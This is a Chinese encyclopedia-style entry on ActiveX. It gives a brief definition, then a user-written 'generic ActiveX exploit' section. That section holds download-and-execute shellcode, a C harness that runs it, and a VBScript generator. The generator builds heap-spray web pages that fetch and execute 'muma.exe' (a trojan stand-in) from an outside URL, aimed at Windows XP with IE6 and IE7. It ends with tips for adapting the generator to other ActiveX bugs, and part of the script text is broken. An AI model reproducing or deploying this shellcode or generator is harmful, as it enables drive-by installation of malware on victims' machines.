词条 | ActiveX |
释义 | § ActiveX ActiveX ActiveX组件实际上是指一些可执行的代码或一个程序,比如一个.EXE、.DLL或.OCX文件,通过ActiveX技术,程序员就能够将这些可复用的软件组装到应用程序或者服务程序中去,嵌入到网页中,随网页传送到客户的浏览器上,并在客户端执行。通过编程,ActiveX控件可以与Web浏览器交互或与客户交互。 § ActiveX漏洞通用Exploit 终于在milw0rm找到了一个不错的shellcode,down&exec的,灰常好用!顺手写了一个C测试了下,结果是成功下载并执行了"木马",muma.exe是我用delphi写的一个简单的执行测试程序,无毒无害。 #include #include unsigned char shellcode[] = "\\xEB\\x54\\x8B\\x75\\x3C\\x8B\\x74\\x35\\x78\\x03\\xF5\\x56\\x8B\\x76\\x20\\x03" "\\xF5\\x33\\xC9\\x49\\x41\\xAD\\x33\\xDB\\x36\\x0F\\xBE\\x14\\x28\\x38\\xF2\\x74" "\\x08\\xC1\\xCB\\x0D\\x03\\xDA\\x40\\xEB\\xEF\\x3B\\xDF\\x75\\xE7\\x5E\\x8B\\x5E" "\\x24\\x03\\xDD\\x66\\x8B\\x0C\\x4B\\x8B\\x5E\\x1C\\x03\\xDD\\x8B\\x04\\x8B\\x03" "\\xC5\\xC3\\x75\\x72\\x6C\\x6D\\x6F\\x6E\\x2E\\x64\\x6C\\x6C\\x00\\x43\\x3A\\x5C" "\\x55\\x2e\\x65\\x78\\x65\\x00\\x33\\xC0\\x64\\x03\\x40\\x30\\x78\\x0C\\x8B\\x40" "\\x0C\\x8B\\x70\\x1C\\xAD\\x8B\\x40\\x08\\xEB\\x09\\x8B\\x40\\x34\\x8D\\x40\\x7C" "\\x8B\\x40\\x3C\\x95\\xBF\\x8E\\x4E\\x0E\\xEC\\xE8\\x84\\xFF\\xFF\\xFF\\x83\\xEC" "\\x04\\x83\\x2C\\x24\\x3C\\xFF\\xD0\\x95\\x50\\xBF\\x36\\x1A\\x2F\\x70\\xE8\\x6F" "\\xFF\\xFF\\xFF\\x8B\\x54\\x24\\xFC\\x8D\\x52\\xBA\\x33\\xDB\\x53\\x53\\x52\\xEB" "\\x24\\x53\\xFF\\xD0\\x5D\\xBF\\x98\\xFE\\x8A\\x0E\\xE8\\x53\\xFF\\xFF\\xFF\\x83" "\\xEC\\x04\\x83\\x2C\\x24\\x62\\xFF\\xD0\\xBF\\x7E\\xD8\\xE2\\x73\\xE8\\x40\\xFF" "\\xFF\\xFF\\x52\\xFF\\xD0\\xE8\\xD7\\xFF\\xFF\\xFF" "http://fenggou.net/muma.exe"; int main() { void (* code)(); //把ShellCode转换成一个参数为空,返回为空的函数指针,并调用 * (int *) & code = shellcode; code(); } 在学习ActiveX的时候读过联众的AX漏洞生成器,思路不错,但不知道什么原因,那个生成器的shellcode我并不能执行成功,索性将其shellcode与heap spray方法暴力分配内存的JS进行了修改,反正在我本机测试100%成功,XP SP2 IE6&IE7。 exeurl = InputBox( "Please input you want down&exec url:", "输入","http://fenggou.net/muma.exe" ) if exeurl "" then 
code="\\xEB\\x54\\x8B\\x75\\x3C\\x8B\\x74\\x35\\x78\\x03\\xF5\\x56\\x8B\\x76\\x20\\x03\\xF5\\x33\\xC9\\x49\\x41\\xAD\\x33\\xDB\\x36\\x0F\\xBE\\x14\\x28\\x38\\xF2\\x74\\x08\\xC1\\xCB\\x0D\\x03\\xDA\\x40\\xEB\\xEF\\x3B\\xDF\\x75\\xE7\\x5E\\x8B\\x5E\\x24\\x03\\xDD\\x66\\x8B\\x0C\\x4B\\x8B\\x5E\\x1C\\x03\\xDD\\x8B\\x04\\x8B\\x03\\xC5\\xC3\\x75\\x72\\x6C\\x6D\\x6F\\x6E\\x2E\\x64\\x6C\\x6C\\x00\\x43\\x3A\\x5C\\x55\\x2e\\x65\\x78\\x65\\x00\\x33\\xC0\\x64\\x03\\x40\\x30\\x78\\x0C\\x8B\\x40\\x0C\\x8B\\x70\\x1C\\xAD\\x8B\\x40\\x08\\xEB\\x09\\x8B\\x40\\x34\\x8D\\x40\\x7C\\x8B\\x40\\x3C\\x95\\xBF\\x8E\\x4E\\x0E\\xEC\\xE8\\x84\\xFF\\xFF\\xFF\\x83\\xEC\\x04\\x83\\x2C\\x24\\x3C\\xFF\\xD0\\x95\\x50\\xBF\\x36\\x1A\\x2F\\x70\\xE8\\x6F\\xFF\\xFF\\xFF\\x8B\\x54\\x24\\xFC\\x8D\\x52\\xBA\\x33\\xDB\\x53\\x53\\x52\\xEB\\x24\\x53\\xFF\\xD0\\x5D\\xBF\\x98\\xFE\\x8A\\x0E\\xE8\\x53\\xFF\\xFF\\xFF\\x83\\xEC\\x04\\x83\\x2C\\x24\\x62\\xFF\\xD0\\xBF\\x7E\\xD8\\xE2\\x73\\xE8\\x40\\xFF\\xFF\\xFF\\x52\\xFF\\xD0\\xE8\\xD7\\xFF\\xFF\\xFF"&Unicode(exeurl&Chr(00)&Chr(00)) Function Unicode(str1) Dim str,temp str = "" For i=1 to len(str1) temp = Hex(AscW(Mid(str1,i,1))) If len(temp) " fileS.writeline "Sina" fileS.writeline "" fileS.writeline "" fileS.writeline "" fileS.writeline "var shellcode = unescape("""&replaceregex(code)&""");" fileS.writeline "var bigblock = unescape(""%u9090%u9090"");" fileS.writeline "var headersize = 20;" fileS.writeline "var slackspace = headersize+shellcode.length;" fileS.writeline "while (bigblock.length" fileS.writeline "" fileS.writeline "" files.Close Set fso=nothing end if 仍然使用VBS,修改成其他漏洞exp的时候修改buffer长度,与漏洞AX的classid与参数传递方法即可:) |